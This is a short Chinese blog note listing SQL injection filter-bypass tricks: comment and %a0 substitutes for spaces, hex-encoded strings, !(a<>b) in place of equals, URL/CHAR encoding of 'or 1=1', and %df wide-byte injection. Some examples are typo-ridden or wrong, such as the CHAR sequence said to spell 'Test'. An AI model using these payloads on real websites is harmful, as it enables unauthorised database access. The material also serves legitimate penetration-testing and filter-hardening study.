SQL注入Bypass
绕过空格
/**/ 注释代替空格
%a0
<>
过滤引号
使用hex替代
如:
select coulumn_name from information_schema.columns where tabel_name = 'users'
select coulumn_name from information_schema.columns where tabel_name = 0x7573657273
过滤等号
将=换为!(<>)#不大于也不小于就是等于
如:
where name = 'flagtable'
where !(name<>'flagtable')
通用绕过(编码)
如URLEncode编码,ASCII,HEX,unicode编码绕过:
or1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
宽字节注入
用%df来消掉(转义符)
标签:编码,name,CHAR,Bypass,SQL,where,注入 From: https://www.cnblogs.com/master-lio/p/18024968